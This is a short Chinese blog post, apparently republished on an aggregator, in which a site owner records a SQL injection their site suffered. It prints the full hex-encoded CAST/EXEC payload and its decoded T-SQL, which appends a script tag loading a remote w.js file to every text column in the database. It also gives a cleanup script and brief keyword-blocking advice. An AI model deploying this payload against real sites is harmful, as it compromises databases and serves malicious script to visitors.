程序博客网 > windows在哪下载

使用CAST来SQL注入

来源:互联网 发布:windows在哪下载 编辑:程序博客网 时间:2024/05/01 16:17

自己的网站曾经经历过这种SQL注入。所以把一个例子放在这里,以便日后查询。

 

进行SQL注入的人会在你的url上加入如下的数据。

 

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

 

 

以上的数据大部分的16进制的。里面的内容是

 

 

 

当然,防止这种事情的发生还是很重要的。

如,declare,EXEC, varchar等作为关键字。还有很多关键字,因为时间有限,所以不多写。

;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

 

上面的SQL语句的作用是

1. 搜索所有带有text, varchar等字段用户自定义表

2. 循环一个一个第注入自己的代码。

 

根据以上的代码,可以这样复原数据:

 

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

windows在哪下载 windows在哪下载
原创粉丝点击
热门IT博客
系统盘垃圾清理软件系统盘垃圾清理软件
java中main函数java中main函数
kali 扫描windows
mac 删除软件缓存
女生当程序员
淘宝店铺海报图片750
c语言标准
软件板块拓尔思
gre作文字数 知乎
win7安装linux系统
seo与sem的区别是什么
梦幻西游鼠标偏移源码
修仙 知乎
重命名文件夹 linux
树莓派gpio编程工具
图知天下
系统无法启用网络发现
java工程打包成jar
excel表格数据链接
多益网络在线客服
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 养驴的利润与成本驴价格行情 哪里有养驴基地 养驴前景 养驴利润怎样销路怎样 养驴的利润与成本 驴养殖前景 怎样养驴 养驴网 肉驴养殖技术 驴的养殖 养驴技术 肉驴养殖前景 养驴技术大全 肉驴 驴的养殖技术 养驴为什么有人不养呢 如何养驴 驴的养殖成本与利润 肉驴种驴 肉驴的价格 肉驴基地 养10头肉驴利润多少 驴养殖成本 驴骡 驴子养殖 毛驴养殖技术 毛驴价格 肉羊种苗 养鬼 养鬼吃人 养鬼术 养鬼仔 家养胆小鬼 万界养鬼系统 养了一群鬼崽子 亦狸 鬼养我的那几年 二钱三卦 我职业养鬼人 夫人乖咱们不养鬼 美食主播教你如何养鬼 养鱼

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里